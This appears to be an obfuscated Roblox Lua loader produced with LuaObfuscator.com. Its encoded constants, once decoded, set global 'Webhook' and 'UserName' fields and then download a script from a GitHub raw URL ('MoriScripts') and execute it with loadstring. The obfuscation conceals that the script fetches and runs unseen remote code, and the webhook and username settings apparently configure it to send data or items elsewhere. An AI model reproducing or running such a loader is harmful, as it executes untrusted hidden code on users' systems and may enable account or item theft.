--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v99=v5(v81,v19);v19=nil;return v99;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + (91 -27)))) -(v32-(932 -(857 + 74)))) + ((1634 -(68 + 997)) -(367 + 201)))) ;return v83-(v83%(928 -(214 + 713))) ;end end else local v84=0 + (1270 -(226 + 1044)) ;local v85;while true do if (v84==(0 + 0)) then v85=2^(v32-(878 -(282 + 595))) ;return (((v31%(v85 + v85))>=v85) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(118 -((989 -(892 + 65)) + 85))) then return v35;end if (v34==(0 + (0 -0))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -95365)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + (1138 -(116 + 1022)) ;local v45=(v20(v43,3 -2 ,972 -(802 + 150) ) * ((20 -(10 + 8))^(85 -53))) + v42 ;local v46=v20(v43,21,55 -24 );local v47=((v20(v43,474 -(416 + 26) )==1) and  -(1 + 0)) or (998 -(915 + (341 -259))) ;if (v46==(0 + 0)) then if (v45==((0 + 0) -0)) then return v47 * (0 -0) ;else v46=431 -(44 + 386) ;v44=0;end elseif (v46==(1193 + (3117 -2263))) then return ((v45==(0 -0)) and (v47 * ((1188 -(1069 + 118))/((0 -0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-((3096 -(814 + 45)) -1214) ) * (v44 + (v45/((1 + 1)^(92 -(98 -58))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=1 + 0 ;end if (v49==(888 -((898 -637) + 624))) then return v6(v51);end if (v49==(3 -1)) then v51={};for v89=1081 -(1020 + 60) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=1426 -(630 + 793) ;end if (v49==(3 -(1749 -(760 + 987)))) then v50=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;v49=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v65=1518 -(1191 + 327) ;while true do if (v65==(1 + 0)) then if (v52~=2) then else local v95=0;while true do if (v95~=(698 -(208 + 490))) then else for v100=1,v23() do local v101=0;local v102;local v103;local v104;while true do if (v101==(0 + 0)) then v102=0 + 0 ;v103=nil;v101=837 -(660 + 176) ;end if (v101~=(1 + 0)) then else v104=nil;while true do if ((202 -(14 + 188))~=v102) then else local v172=675 -(534 + 141) ;while true do if (v172==0) then v103=0 + 0 ;v104=nil;v172=1;end if (v172==1) then v102=1;break;end end end if (v102~=(1 + 0)) then else while true do if (v103~=(0 + 0)) then else v104=v21();if (v20(v104,1 -0 ,1)==(0 -0)) then local v176=0 -0 ;local v177;local v178;local v179;while true do if (v176==2) then local v180=0;while true do if (v180~=0) then else if (v20(v178,1,1)~=(1 + 0)) then else v179[2]=v58[v179[2 + 0 ]];end if (v20(v178,2,398 -(115 + 281) )==1) then v179[6 -3 ]=v58[v179[3 + 0 ]];end v180=1;end if (v180~=(2 -1)) then else v176=3;break;end end end if (v176~=(0 -0)) then else local v181=0;while true do if (v181~=0) then else v177=v20(v104,2,3);v178=v20(v104,4,873 -(550 + 317) );v181=1 -0 ;end if (v181==1) then v176=1;break;end end end if (v176~=(3 -0)) then else if (v20(v178,8 -5 ,288 -(134 + 151) )==(1666 -(970 + 695))) then v179[4]=v58[v179[7 -3 ]];end v53[v100]=v179;break;end if ((1991 -(582 + 1408))==v176) then local v183=0 -0 ;while true do if (v183==(1 -0)) then v176=7 -5 ;break;end if (v183==(1824 -(1195 + 629))) then v179={v22(),v22(),nil,nil};if (v177==(0 -0)) then local v190=0;local v191;local v192;while true do if (0==v190) then v191=241 -(187 + 54) ;v192=nil;v190=1;end if (v190==1) then while true do if (v191==(780 -(162 + 618))) then v192=0;while true do if (v192~=0) then else v179[3 + 0 ]=v22();v179[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v177==1) then v179[3]=v23();elseif (v177==2) then v179[6 -3 ]=v23() -(2^(26 -10)) ;elseif (v177==(1 + 2)) then local v195=0;local v196;while true do if (v195==0) then v196=1636 -(1373 + 263) ;while true do if ((1000 -(451 + 549))~=v196) then else v179[1 + 2 ]=v23() -(2^(24 -8)) ;v179[6 -2 ]=v22();break;end end break;end end end v183=1385 -(746 + 638) ;end end end end end break;end end break;end end break;end end end for v105=1 + 0 ,v23() do v54[v105-1 ]=v28();end v95=1 -0 ;end if (v95~=(342 -(218 + 123))) then else return v56;end end end break;end if (v65~=0) then else if (v52==0) then local v96=1581 -(1535 + 46) ;while true do if (v96==(0 + 0)) then v53={};v54={};v96=1 + 0 ;end if (v96==1) then v55={};v56={v53,v54,nil,v55};v96=2;end if (2==v96) then v52=1 + 0 ;break;end end end if (v52==(1 -0)) then local v97=1467 -(899 + 568) ;local v98;while true do if (v97==(0 + 0)) then v98=0;while true do if (v98~=(2 -1)) then else for v145=604 -(268 + 335) ,v57 do local v146=0;local v147;local v148;local v149;while true do if (v146~=(290 -(60 + 230))) then else v147=572 -(426 + 146) ;v148=nil;v146=1;end if (v146==1) then v149=nil;while true do if ((0 + 0)==v147) then v148=v21();v149=nil;v147=1457 -(282 + 1174) ;end if (v147~=(812 -(569 + 242))) then else if (v148==1) then v149=v21()~=(0 -0) ;elseif (v148==2) then v149=v24();elseif (v148~=(1 + 2)) then else v149=v25();end v58[v145]=v149;break;end end break;end end end v56[1027 -(706 + 318) ]=v21();v98=2;end if (v98==2) then v52=1253 -(721 + 530) ;break;end if (v98~=(1271 -(945 + 326))) then else v57=v23();v58={};v98=2 -1 ;end end break;end end end v65=1;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v86=0,v74 do if (v86>=v68) then v72[v86-v68 ]=v73[v86 + 1 ];else v76[v86]=v73[v86 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=11) then if (v79<=5) then if (v79<=2) then if (v79<=0) then do return;end elseif (v79==1) then v76[v78[2]]();else for v150=v78[2],v78[3] do v76[v150]=nil;end end elseif (v79<=3) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v78[2];v109=v76[v78[3]];v107=1;end if (v107==1) then v76[v108 + 1 ]=v109;v76[v108]=v109[v78[4]];break;end end elseif (v79>4) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else local v127=0;local v128;while true do if (v127==0) then v128=v78[2];v76[v128]=v76[v128](v13(v76,v128 + 1 ,v71));break;end end end elseif (v79<=8) then if (v79<=6) then v76[v78[2]]=v61[v78[3]];elseif (v79>7) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else v76[v78[2]]=v78[3];end elseif (v79<=9) then local v112=v78[2];local v113,v114=v69(v76[v112](v13(v76,v112 + 1 ,v78[3])));v71=(v114 + v112) -1 ;local v115=0;for v123=v112,v71 do v115=v115 + 1 ;v76[v123]=v113[v115];end elseif (v79>10) then v76[v78[2]]=v61[v78[3]];else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=17) then if (v79<=14) then if (v79<=12) then v70=v78[3];elseif (v79>13) then v76[v78[2]]=v78[3];else local v136=v78[2];local v137,v138=v69(v76[v136](v13(v76,v136 + 1 ,v78[3])));v71=(v138 + v136) -1 ;local v139=0;for v157=v136,v71 do local v158=0;while true do if (v158==0) then v139=v139 + 1 ;v76[v157]=v137[v139];break;end end end end elseif (v79<=15) then local v117=0;local v118;while true do if (v117==0) then v118=v78[2];v76[v118]=v76[v118](v13(v76,v118 + 1 ,v71));break;end end elseif (v79>16) then for v161=v78[2],v78[3] do v76[v161]=nil;end else do return;end end elseif (v79<=20) then if (v79<=18) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==19) then v70=v78[3];else v76[v78[2]]();end elseif (v79<=21) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==22) then local v141=0;local v142;local v143;while true do if (1==v141) then v76[v142 + 1 ]=v143;v76[v142]=v143[v78[4]];break;end if (v141==0) then v142=v78[2];v143=v76[v78[3]];v141=1;end end else v76[v78[2]]=v78[3]~=0 ;end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200253O0012073O00014O0011000100013O0026053O0002000100010004133O00020001001207000100013O00260500010012000100020004133O0012000100120B000200033O00301500020004000500120B000200063O00120B000300073O002003000300030008001207000500094O0017000600014O0009000300064O000F00023O00022O00010002000100010004133O0024000100260500010005000100010004133O00050001001207000200013O00260500020019000100020004133O00190001001207000100023O0004133O0005000100260500020015000100010004133O0015000100120B000300033O0030150003000A000500120B000300033O0030150003000B0005001207000200023O0004133O001500010004133O000500010004133O002400010004133O000200016O00017O00",v9(),...);end
